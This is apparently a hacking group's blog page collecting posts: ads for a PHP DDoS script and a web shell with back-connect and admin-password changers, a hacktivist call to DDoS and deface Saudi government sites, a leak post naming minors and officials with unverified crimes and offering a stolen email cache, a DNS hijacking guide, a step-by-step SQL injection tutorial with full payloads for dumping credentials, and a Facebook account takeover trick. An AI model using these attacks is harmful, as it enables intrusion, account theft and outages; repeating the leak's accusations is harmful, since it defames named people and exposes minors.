Twitter Page
Just a heads up for future events and notifiers – Twitter page made!
You can follow me on twitter here: https://twitter.com/CentralIntHacke
Hulk DDOSer (Updated)
Hulk DDOSer is a php script for those who are running on very slow internet speed but want to DOS website. Hulk Hulk DDOSer is coded by Manish Tanwar from Team Indishell.
Reverse Engineering camera firmware ip
In this tutorial we are going to understand the ip camera firmware software like what actually running inside ip camera by doing some reverse engineering on the firmware of ip camera.
[PHP] Download config File Killer and Mannu Shell (updated Version) Coded By Team Indishell
[PHP] Download config File Killer and Mannu Shell (updated Version) Coded By Team Indishell
- Genrate php.ini
- Mannual Symlinking
- Automated Mass Symlink
- perl Based Symlink
- command execution
- CGI Telnet
- CMS based symlink,
- VBulletin,wordpress and Joomla admin panel password changer
- PERL Back connect
- Python Back connect
- Can’t read /etc/named.conf” bypasser+auto symlink public_html directory
- username (ls /etc/valiases)
3 Reasons Not to Use Free URL Shorteners (protect your shorturls)
Here’s are 3 reasons why should never use a free URL shortener or link cloaking service:
1) A lot of ISPs block them because they often collect your data and share it with other sites. ISPs don’t like that! And what happens if they get hacked and/or blacklisted? Don’t take a chance in letting your links get blocked.
2) You don’t control the service, so if they go out of business all your links quit working. Think about it. Do you keep a record of all your short links you use by a 3rd party?
3) Those URLs you shorten are impossible to remember and/or edit later. One of my pet peeves is I can’t go back and edit where it goes on some of the services out there.
So what’s the solution? Use an affiliate cloaking/redirect script on your own domain that protects you from all these things and more.
My friend Christine Cobb recommended a tool to me and I’ve been using it for about a month now. I love it! It’s super easy to use, only takes seconds to create a shorturl, tracks clicks, and even makes QR Codes!
I set mine up on a separate domain (reginahelp.me) and use that domain only for my shorturls.
Check out Easy Redirect Script at http://reginahelp.me/easyredirectscript/ <–that’s my affiliate link 
Since I am using WordPress for my website, I am trying to decide if I want to convert my Pretty Link Pro links or continue to use the plugin. I love the way Pretty Links works, tracks, and it’s right inside my Dashboard.
#OpBloodMoney
VIDEO: http://cnn.com/video/#/video/world/2013/02/05/pkg-jamjoom-saudi-cleric-daughter-killed.cnn
Outrage is mounting in Saudi Arabia about the case of a 5-year-old girl who died after allegedly being beaten and tortured by her father, who activists say is an Islamist preacher.
Lama Al-Ghamdi was admitted to King Saud Hospital in Riyadh last March after suffering extensive injuries, including broken ribs, a crushed skull, bruising and burns. Family, activists and officials say she died of her wounds in late October.
Lama’s mother and several high-profile activists in Saudi Arabia accuse the girl’s father, Fayhan Al-Ghamdi, of committing those crimes. Saudi Arabia’s Human Rights Commission, a government-backed rights group, confirmed that Al-Ghamdi has been accused of torturing his daughter and that he is on trial for crimes leading to her death.
Attempts to reach Al-Ghamdi via activists, government officials and King Saud Hospital have been unsuccessful.
“My dear child is dead, and all I want now is justice so I can close my eyes and know she didn’t die in vain,” the mother, Syeda Mohammed Ali, told CNN. “She was brutally tortured in the most shocking ways.”
Activists say Al-Ghamdi is an Islamist evangelist popular in Saudi Arabia for his televised appearances and for speaking on air about the rewards of repenting to God. But they also say he only fancies himself as a cleric and is not recognized by the clerical establishment.
Some media reports say that Al-Ghamdi was sentenced to pay blood money for Lama’s death, and others say that he has been released from jail. But Mohammed Almadi, with the Human Rights Commission, told CNN that the father has been in prison for about eight months and has been accused of the torture that led to the girl’s death.
Lama’s mother says the next hearing in the case will take place in about two weeks.
“We have appointed a lawyer to assist the mother in the case,” said Almadi, who added that there was a hearing Sunday and that the case is still under review. “Reports that the accused is out of prison are incorrect. The case is still actively being studied.”
At the Sunday hearing, Lama’s mother tried to bring her own case against Al-Ghamdi.
“The Human Rights Commission considers this case to be not just an assault against Lama,” Almadi said, “but also an assault against every Saudi little girl. We are asking that the aggressor receive the maximum penalty.”
Several activists and numerous local media reports say that Lama was also raped, but her mother denied that happened, despite saying that the father had burned Lama’s rectum. Syeda said that Lama’s father also was concerned about the virginity of his 5-year-old daughter.
“The father confessed to the abuse, the beating and torturing Lama in the most obnoxious manners,” she said. “These are not some unfounded accusations, but everything is based on the medical examination by the hospital and the team of physicians who treated Lama when she was first admitted.”
Syeda, who is divorced from Al-Ghamdi, says Lama’s torture occurred while she was staying with her father. She added that Al-Ghamdi is now remarried with two more children and that “the state needs to even consider taking his two children from him and his wife away because I fear for their lives.”
Aziza Al-Yousef, a human rights activist and lecturer at King Saud University, who is in very close contact with Lama’s mother, said this case highlights the urgent need for legislation in Saudi Arabia that would better protect women and children from domestic violence.
“We need to get some laws passed to protect women and children here. It’s been difficult getting these laws passed,” she said. “This case is a horrifying example of the kind of violence that can be faced by children here.”
Prominent Saudi women’s rights activist Manal Al-Sharif, who has launched an online campaign and created a Twitter hashtag, #IAmLAMA, expressed a similar sentiment, explaining how this case reflects once again how dire the situation is for women in Saudi Arabia, who must contend with a male guardianship system that she says infantilizes women and strips them of any power.
“In Saudi Arabia,” Al-Sharif told CNN, “all women are considered minors and are automatically assigned to the care and judgment of their most immediate male relative.”
Al-Sharif said Saudi courts tend to “show leniency toward male abusers,” and she said she is concerned that might happen in this case as well.
Lama’s mother says she wants to make sure this doesn’t happen to other children.
“I want to address the king and urge him to consider my case and my daughter’s case,” she said, “because such brutality needs to be punished in order to set a clear example for anyone who dares to abuse and harm their children.
She states: “My dear child is dead, and all I want now is justice so I can close my eyes and know she didn’t die in vain,” the mother, Syeda Mohammed Ali, told CNN. “She was brutally tortured in the most shocking ways.” So lets bring justice for her.
MORE INFO:
This is just plan out wrong please help us to spread this and help so others may join us in this event we will be hosting. He needs to be in prison to ‘LIFE’ not released he killed his own daughter what the fuck kind of shit is this! & Why would he question his 5 year old daughters virginity WTF?!!? I’m really pissed off about this subject please help spread this paste and make it noticeable justice needs to be served in RIYADH, Saudi Arabia. He needs to be in prison not lurking around the streets.
WHAT NEEDS TO BE DONE AND WHAT WE WILL BE DOING.
To try to reach out to this particular subject will we be downing government sites of RIYADH, Saudi Arabia. Until we are further noticed and taking seriously also, protesting in the cyber-world until this is sprung out and people WAKE UP! And see how corrupt the government can be and what they do to make people get away with stuff like this it’s disgusting. Expect leaks,ddos,defaces and everything you can set your mind on.
FURTHER INFO:
This is for the Activist please to show your support and to help out this #op please hashtag #OpBloodMoney and mention @Op_BloodMoney on twitter, On every social media site you can think of share this Pastebin post with anyone do what you wish to help it matters if you do I want to thank you in advance it you choose to help. This event will be taken place through the weeks from now to February 28th if nothing happens then it will continue.
LINKS TO EVENTS AND SUCH:
Facebook Page: http://www.facebook.com/OpBloodMoney
Facebook Event: http://www.facebook.com/events/285860608210068/
Group Hosting Event: http://www.facebook.com/xL3gi0nhackers.gov
Official Twitter: https://twitter.com/OpBloodMoney
Email: OpBloodMoney@hotmail.com
Link source: http://www.foxnews.com/world/2013/02/04/outrage-over-saudi-blood-money-in-5-year-old-girl-beating-death/#ixzz2Jz14fCAa
Link Source: http://www.dailymail.co.uk/news/article-2273171/Fayhan-al-Ghamdi-raped-tortured-daughter-5-death-escapes-light-sentence.html#axzz2JzuZDJp1
Link Source: http://www.cnn.com/2013/02/04/world/meast/saudi-arabia-girl-death/
The Steubenville Files
On August 11, 2012 two members of the Big Red High School football team in Steubenville, Ohio – USA were arrested and charged with the rape and kidnapping of an out of town 16 year old girl. At the time of this gang rape, the girl was intoxicated and unconscious. The victim had been intentionally drugged with a “date rape” intoxicant. She was photographed in this condition, and there is evidence that she was hauled in a comatose state to multiple parties – and almost certainly raped by more members of the local high school football team than just the two players who currently stand charged. There is even evidence that she was urinated upon during this hideous assault.
Despite all this, it looked as though a town rife with corruption, cronyism, illegal gambling and fixated upon their star high school football team (a major economic revenue engine) were prepared to orchestrate a major cover-up in order to sweep the entire affair under the rug. As this disclosure will document, this cover-up was perpetrated by people in the high school admin, local government and law enforcement.
– Enter Anonymous –
On December 23, 2012 a cell within Anonymous called “Knight Sec” took up the cause of giving a voice to the victim of this horrible crime, and began unraveling this conspiracy of silence designed to protect a group of these high school football players who had become well known to their fellow students as “The Rape Crew”. Fueled by intelligence they had received from many students at Big Red High School, they launched Operation RedRoll by releasing this video. Take careful note of the various screen capture images of pictures taken by these monsters of this poor defenseless girl, and note their many comments made in tweets and Facebook posts regarding their crime (now since deleted).
– James “Jim” Parks –
Mr. Parks is an avid fan of the Big Red High School football team, and is the webmaster and owner of a private fan site for the team. Knight Sec zeroed in on James Parks when intelligence from students in the high school revealed that he had an exceptionally close relationship with many of the players on the football team, including those members of “The Rape Crew”. Anonymous quickly took control of his web servers, and proceeded to deface the front page of his website. Knight Sec then when a step further, and gained control over Mr. Parks private E-Mail account, and downloaded much of it’s contents. Among the many interesting things discovered in this trove were several pornographic images of extremely young women, quite possibly underage. One particularly difficult to explain image lifted from James Parks E-Mail is this picture, which appears to show a scantily clad under-age student. It would seem to have been surreptitiously shot in the girls bathroom at the high school.
Tips received from anonymous high school students in Steubenville have indicated it is possible James Parks was receiving images from “The Rape Crew” of their various “conquests”. At least one of the images discovered in James Parks E-Mail bore a striking resemblance to another rape victim savanah whose attack occurred in Louisville, Kentucky under similar circumstances as Steubenville. We now release the entire E-Mail cache that was liberated by Anonymous and offer it for download and analysis:
James “Jim” Parks E-Mail Files
WARNING: This Zip File Contains Pornographic Images
– Sheriff Fred Abdalla –
Sheriff Fred Abdalla has been the Sheriff of Jefferson County in Ohio USA for 28 years and has stood for election unopposed (with only one rare exception) for his entire career. In this video interview taken at the recent Anonymous organized protest that took place on December 29, 2012 you can clearly hear Sheriff Abdalla admit that he is aware from evidence gathered that numerous individuals witnessed the attack on the victim and yet he oddly states that simply being there and being aware of the attack is not a crime. This is of course completely incorrect, as witnessing a crime and failing to report it is in itself a crime – and under certain circumstances can even be equated to the charge of conspiracy or being an accessory. Certainly having been a law enforcement officer for nearly three decades, the Sheriff knows this fact. Sheriff Abdalla also states in this interview that he has nothing to do with the investigation, yet states that he assisted the local police department in hunting down people who attended these parties at which the girl was attacked and confiscating their cell phones and other electronics. And finally he states, again incorrectly – that he CAN’T investigate the gang rape attack or whether or not this has happened to other victims because it is not his jurisdiction. As almost everyone knows, the Sheriff is the highest law enforcement officer in a county and has jurisdiction over ANYTHING in that county. Under constitutional law, his authority even trumps that of the federal law enforcement agencies in his own county. Watch the video, and make note of the points above – this man is lying:
LocalLeaks has confirmed that Sheriff Abdalla and Head Football Coach Reno A. Saccoccia have breakfast a couple of times a week together at the Spot Bar in Steubenville. Recall that per Sheriff Abdalla’s own admission in the video interview above, it was he who was tasked with retrieving the cell phones and other electronic gear from the football players and other students involved in the gang rape of the young girl. In the process of this operation to retrieve the cell phones, several KEY pieces of video and photographic evidence were “inadvertently” deleted by the Sheriff and his deputies. And finally, Sheriff Abdalla runs the largest illegal gambling operation in Jefferson County – employing bookies who work out of the Spot Bar in Steubenville. Sheriff Abdulla’s brother is the largest importer of cocaine in Jefferson County.
– Prosecuting Attorney Jane Hanlin –
The Honorable Jane Hanlin is a Proccesting Attorney for Jefferson county and the mother of Big Red football player Charlie Keenan, who is suspected of being a member of “The Rape Crew”. Jane Hanlin represented Edward “Eddie” Lulla in his divorce this summer (spending a great deal of time with him). Mr. Lulla is an agent for the BCI who was sent by the State of Ohio to lend oversight to the rape investigation in Steubenville. Not surprisingly, the State of Ohio found everything to be going smoothly. In addition, “Eddie” Lulla’s son was recently chosen to join Steubenville Police Department out of a pool of three candidates. When ranked, his son was not the first candidate. It is crystal clear why Mr. Lulla was unable to find anything wrong with the current investigation (which is being conducted by SPD) into this horrible crime.
It appears that Prosecutor Hanlin doesn’t just cover for her own son, either. In May of 2012, Ed Wilson a Steubenville Big Red football player and two other unknown individuals shot out the windows of 14 vehicles in Steubenville. Despite being arrested, and confessing to the crime – he was never sentenced or made to pay restitution. The case was handled by Jane Hanlin’s office. Prosecutor Hanlin also testified as a character witness for Branko Busick, a former SHS football player. Specific charges are unknown but he was charged in Morgantown, WV and was essentially an “enforcer” for the team. Hanlin claimed she was testifying as a private citizen but several references were made to both her position and her husband’s in the Steubenville PD. The transcript of her testimony can be found here.
Prosecutor Hanlin also remained on the Steubenville City School Board even after receiving notice from the Attorney General’s office this is improper. Her 1st husband is Charlie Keenan, former SHS principal and star athlete in his day.
– Head Football Coach Reno A. Saccoccia –
Head Football Coach Reno Saccoccia is the very heart and leader of this criminal conspiracy of silence designed to protect these young football players not only from the consequences of their many crimes, but seemingly from any responsibility in life that would in any way detract from their athletic careers. His close personal relationship with everyone from the high school principal to Sheriff Abdalla have served to make this mere football coach one of the most powerful people in Steubenville. Reno Saccoccia’s sister in law, Marguierete Clark – is the secretary for the juvenile court Judge Kerr. Coach Saccoccia is actually employed as a mediator in juvenile court system! Coach Saccoccia’s motto to his boys is: “lie till you die”. The moment he became aware of the gang rape he attempted to hold off sheriff deputies when they seized the telephones and other electronic items belonging to the perpetrators, meanwhile encouraging his “boys” to delete everything.
But Coach Saccoccia’s regime doesn’t just extend to protecting these boys from the dire consequences of serious criminal activity. Mr. Saccoccia has wielded his considerable power to form a sort of social and academic bubble of protection around these boys in order to insulate them from even the most basic daily responsibilities faced by any other high school student in Steubenville. The students in the classes at Steubenville High School are carefully segregated. Football players take their exams separate from other students, and they are allowed and even encouraged to cheat. The teachers assist the players in cheating on state tests, and this results in a 100 percent pass rate by all football players on these exams.
And finally, this regime goes beyond mere protection. Big Red Football Players are rewarded for their athletic prowess with a carefully moderated system of vice. Assistant Coach Pierro handles this aspect of the “program”, allowing the boys to view porn on his computer – and even providing drugs and alcohol to those who are “extra” deserving. Pierro is assisted in his seedy duties by none other than James Parks, profiled above. The drugs for the boys “entertainment” are supplied by known local drug dealer Nathan Hubbard, who is also a patron of the Spot Bar in Steubenville from which he is known to peddle his poisons. The “date rape” drug used to knock the victim of the gang rape unconscious was supplied by this criminal with the knowledge and consent of Parks and Pierro.
– The Den Of Iniquity –
The Spot Bar is located at 217 South 4th Street in Steubenville, Ohio. The Spot Bar has been owned by Joe DiAlbert since 1977. This establishment is the physical home base for the “Old Boys” network that is the heart of the cronyism and corruption in Steubenville. We know that several of the conspirators profiled above meet there several times a week. But this seedy and disreputable establishment is far more than a simple meeting place.
The Spot Bar is the prime watering hole, and “working office” of the drug dealer Nathan Hubbard, who is the primary supplier of illegal narcotics to the Big Red football team. But he is far from the only drug dealer working this choice selling spot. The Spot Bar is well known in the community as the “go to” place to purchase illicit drugs, and is serviced by a number of well known dealers in the community. Given the predilection of certain law enforcement officers from both the Sheriff’s department as well as SPD to frequent the Spot Bar, one has to assume that there is some level of protection being granted by law enforcement in Steubenville for this underground drug market. And finally, deserving high school football players and other under-age students are allowed to drink illegally especially after hours.
One big question that might come to mind when studying this disclosure would be, why? Why this elaborate conspiracy just to shelter and protect a high school football team? The answer is as old as humankind, MONEY. Not only is this football team the very epicenter of social life in this otherwise sleepy little mid-western town, but it is a huge economic engine in the community – generating millions of dollars in economic activity, tax revenue – and income in the form of hundreds of jobs. But not all of the economic activity generated by this football team is legitimate. One of the biggest and most popular revenue streams connected with the Big Red football team is gambling. And the Spot Bar is worked by several of Steubenville’s biggest “bookies”.
While the Spot Bar is by far the most popular, it is not the only “den of iniquity” where this type of activity takes place. Another local business that caters to Big Red fans and players is the Triple Play Cafe in Steubenville. It’s a confirmed fact that underage high school students are in this establishment often. They host an event on Wednesdays during the football season and then allow anyone regardless of age to stay after close to drink and hang out. Its also reported by eyewitnesses that the owner let’s young underage girls in just so he can hit on them. Smoking in doors is supposed to be banned by law as well but after 10:00 pm everyone can smoke in this place.
– The “Rape Crew” –
It is important to state at this point in the disclosure that not all of the Big Red football team are rapists or criminals. In fact, the vast majority of young people involved with the team are good, honest and hardworking athletes simply trying to do the best they can. The focus of this investigation has centered upon a very small group of miscreants who are known by their peers and fellow students as “The Rape Crew”.
Now, the very fact that this core group of criminals within the student body are known by this moniker should set off alarm bells for everyone. This entire investigation has centered around a single rape victim and assault that came to light this summer. But you don’t get a name like “Rape Crew” from a single incident of gang rape committed upon a lone victim. One thing is certain, there ARE more victims out there. One of the chief aims in exposing and bringing to justice the participants and beneficiaries of this conspiracy is to embolden, encourage – and empower these other victims to come forward and seek justice.
Trent Mays: Was a sophomore and a quarterback for the Big Red football team at the time of this brutal crime in August of 2012. He was originally charged as an adult with rape and kidnapping, and held in custody. He has since had the kidnapping charges dropped, the rape case moved to the juvenile court system – and has been released on bail.
Malik Richmond: The only other member of the football team to remain charged. Richmond was also originally charged as an adult with rape and kidnapping, and held in custody. Like his co-defendant Mays, he has since had the kidnapping charges dropped, the rape case moved to the juvenile court system – and has been released on bail.
Michael Colin Nodianos: A former Big Red football player, and clearly an avid and full participant in the “Rape Crew” – Nadianos was videoed along with several other students, some of whom appear to be football players and perpetrators of this horrible crime. In this explosive video, Nadianos goes on for over 12 minutes describing the crime in great detail and confessing to his full participation including raping the girl at least once himself. In addition, Nadianos implicates several other members of the “Rape Crew” in the attack. Local law enforcement had been advised of the existance of this video, but claimed they could not retrieve it. This video was obtained by the Anonymous Cell “Knight Sec” and turned over to LocalLeaks. The video was shot so soon after the attack, that one person present becomes disgusted and actually leaves to go check on the condition of the victim. It is important to also note that despite this strong evidence, Nadianos has yet to be arrested or charged in this brutal attack.
WARNING: This Video Is Extremely Disturbing – Viewer Discretion Is Advised
Michael Colin Nodianos Confession – Original Video Source Download
A student by the name of Evan Westlake taped this video. fellow students Shawn McGee, Niko Murray and Anthony Craig also appear in the video in the background with both Murray and McGee not happy with the topic and pissed at Mays.
Michael Nodianos is 18 years old and is currently a student at Ohio State University. As the video above shows all too graphically, this young man is a sociopath and needs to be in prison not living it up on a scholarship at college.
Charlie Keenan: Charlie is the son of the County Prosecuting Attorney Jane Hanlin and a member of the Big Red football team. He is also a well known member of the “Rape Crew”. One of the parties to which the unconscious victim of this horrible crime was dragged to took place at the Hanlin house, and we have reason to believe that the photo at the head of this section of two of the victim’s abusers carrying her in a comatose state was taken by Cody Saltsman at the Hanlin residence the night of the attack. It is reported that Keenan took video of the attack on the girl, which has mysteriously disappeared.
Cody Saltsman: Saltsman was originally charged in the gang rape. After a private back-room meeting at Naples Pasta House restaurant in Steubenville between Saltsman’s father, the Sheriff – and a certain Mr. Teramana (a wealthy Steubenville resident) – Cody Saltsman’s charges were mysteriously dismissed. Saltsman is a former boyfriend of the victim of this attack, and it appears there is quite a bit of bad blood between them – adding a layer of vengence and viciousness that may explain the raw brutality of the attack upon this girl. Saltsman is perhaps one of the most repugnant individuals the LocalLeaks staff has ever encountered. His posts on Twitter and other social media show him to not only be completely callous regarding the horrendous abuse that he and his friends meted out upon their defenseless victim, but show clearly that this young man is an extremely dangerous sociopath who truly needs to be incarcerated.
While the charges regarding the attack were dropped against Saltsman, he has provided ample evidence that he was present during this vicious gang rape – incriminating himself with multiple photos that he took of the victim during the various parties she was transported to. Examine these two photo’s, one posted by Saltsman to his Instagram account and the other posted to Twitter by another member of the “Rape Crew” closely. These images are of another unknown victim of the “Rape Crew” published by Saltsman in 2011.
Clearly Saltsman was present during the attack on this girl, making him at the very least guilty of accessory and conspiracy.
Keep up on UPDATES HERE : http://www.facebook.com/pages/Operation-Rollredroll/345900582184888
DNS Hacking/Hijacking Tutorial
This Solitary Man today i am posted DNS HACKING/HIJACKING TUTORIAL.This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.
To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.
Why DNS?
The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.
Malicious DNS Server
So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.
Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)
sudo gedit /etc/dnsmasq.conf
The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof
The format for this is address=/HOST/IP
So for example;
address=/facebook.com/63.63.63.63
where 63.63.63.63 is the IP of your malicious web server
Save the file and restart dnsmasq by running
sudo /etc/init.d/dnsmasq restart
You now have a DNS server running which will redirect requests for facebook.com to63.63.63.63
Malicious Web Server
You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.
There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site
I’ll presume you know how to do that though
Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.
I Can Be Your DNS Server Plz?
An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that
But how do you get a victim? Well this is where my project, the IP Experiment could come in handy
If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.
Manual SQL Injection | Error Based
What is SQL injection ?
SQL Injection is the method used for bypassing user authentication of any webform(Login portals).An attacker gives a malicious string input to the webform which takes the user to the admin area of websites. An attacker can add, delete files and play with website contents after gaining access to the admin area.
1. Check for vulnerability
let‘s say that we have some site like this
http://www.site.com/news.php?id=1
Now to test it is vulnerable we add to the end of URL ‘ (quote), and that would be
http://www.site.com/news.php?id=1′
If it is vulnerable you should get an SQL error such as
“Sorry: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1” or something like that.”
2. Find the number of columns
To find number of columns we use statement ORDER BY. This function tells the SQL database how to order the result. We use this to find how many tables are there. You need to type order by 1/*(or 1–) and keep adding one until you get an error.
Example:
http://www.site.com/news.php?id=1 order by 1/* <– no error
http://www.site.com/news.php?id=1 order by 2/* <– no error
http://www.site.com/news.php?id=1 order by 3/* <– no error
http://www.site.com/news.php?id=1 order by 4/* <– An error
This means there are only 3 tables because we got an error after order by 3
3. Check for UNION function
The UNION function shows data from the selected tables or columns etc.
Example:
http://www.site.com/news.php?id=1 union all select 1,2,3/*
OR (anyone is used , same result )
http://www.site.com/news.php?id=1 union all select 1,2,3–
(We know there are 3 tables). If you see numbers on the page then the UNION function is working. Try – in place of /* if the query doesn‘t give any result.
4. Check for MySQL version
If you get, say number one, then this is where we insert the @@version or version(). (@@version or version() represent the version of the database)
Example:
http://www.site.com/news.php?id=1 union all select @@version,2,3/*
You may get “Illegal mix of collations (IMPLICIT+ COERCIBLE) kind of errors. If you get any error while using above query then you must need to convert the statement using the convert() function.
Example:
http://www.site.com/news.php?id=1 union all select unhex(hex(@@version)),2,3/*
5. Getting table and column name
— If the MySQL version is < 5 (i.e 4.1.33, 4.1.12…).
We need to guess table names in most of cases. You can guess some table names from listed below: user, admin, member, username, user, usr, user_name, password,pass, passwd, pwd etc.
Example:
http://www.site.com/news.php?id=1 union all select 1,2,3 from admin/*
If we see any number,it can be 1 or 2 or 3, and then it concludes that table name admin exists in database. Now check Column names.
Example(find username):
http://www.site.com/news.php?id=1 union all select 1,username,3 from admin/*
If you get an error the column doesn’t exist.
If it works you will get a username displayed on the page, example would be admin, or superadmin etc.
Example(finding password):
http://www.site.com/news.php?id=1 union all select 1,password,3 from admin/*
If you get an error the column doesn’t exist. If it worked, you will see a password on the page in hash format or in plain-text format. Join all strings using the concat() function. The concat() function joins all strings related to your query.
Example:
http://www.site.com/news.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*
(0x3a is Hex for a colon). You could also use an ASCII value for the colon. Using ASCII Table. If it worked you will see all usernames and passwords in order like so: username:password Some admin change the column name but you can use mysql.user instead.
Example:
http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
–If the MySQL version is =>5
Find Table name
We use table_name and information_schema.tables.for this purpose.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*
Here we replace the our number 2 with table_name to get the first table from information_schema.tables
If we couldn‘t find any result then we need to add LIMIT to the end of query to list out all tables.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
We can change limit 0,1 to limit 1,1.To view the 2nd table.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table will be displayed.
We should have to put limit 2,1to get 3rd table.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
We need to add one until we will get some useful like db_admin, poll_user, auth,auth_user etc.
Find Column names:
Here we use column_name and information_schema.columns
Example:
http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column wills be displayed.
Example:
http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.tables limit 1,1/*
The second table will be displayed.
We need to put limit 0,1 to get 3rd table.
Example(Finding Password):
http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
You will get into in this format user:password(or hash):email
example:
admin:hash:whatever@blabla.com
Now you see the username , e-mail and password in hash on the webpage. As seen below:
Just copy the hash password and go to the best hash cracking sites to crack the hash.
I recommend you http://md5decrypter.co.uk/
Now find the login page of the site. Suppose i have
http://www.site.com/admin/login.php
Now enter the username and password and you made access to the admin panel. Now just play with the website content…………………… Ha ha ha
SQL Vulnerable Sites List
.::Download::.
SQL Injection Automated Tools
.::Download::.
.::Download::.
Hacking Facebook with Hotmail > Latest Working Trick 2013
Step 1. Make a hotmail (microsoft now..) account.
Step 2. Go to Messenger up the top next to ‘Hotmail’
Step 3. Add friends
Step 4. Read ‘Add people from other services’ If you can’t read click away now… >oxymoron
Step 5. Click the Facebook one and don’t change anything on the next screen, hit connect to facebook.
Step 6. Give it a few seconds to connect your facebook yadayada yada
Step 7. Click on the facebook picture again and it’ll say click the facebook logo to get email addresses of your facebook contacts
Step 8. You will be given two different lists. One with ‘already on microsoft/hotmail’ and one saying they aren’t currently on it. You can’t hack anyone off the first list, but any hotmail addresses on the second list are up for grabs.
Step 9. Create a hotmail account that has the same address as one of the emails saying it is not currently on hotmail.
Step 10. Go to facebook, try login with the persons email that you have now created. It will say wrong and give you an option to reset.
Step 11. Cancel any phones/alternative emails that are attached to the account for the reset, then hit reset. You will be brought to a change password screen because you are already logged into hotmail. Taa-daa
Extra shit nobody is going to read.
~ use a proxy if the person does not live in the same place as you or you might get the account locked.
~ Use common sense, use a proxy each time you login AFTER the first login. It will not disable the account after you have logged in once.
~ Don’t be a dick and ruin someone elses social life through their facebook
xL3gi0n Hackers | Hacking Tutorials & Much More ! 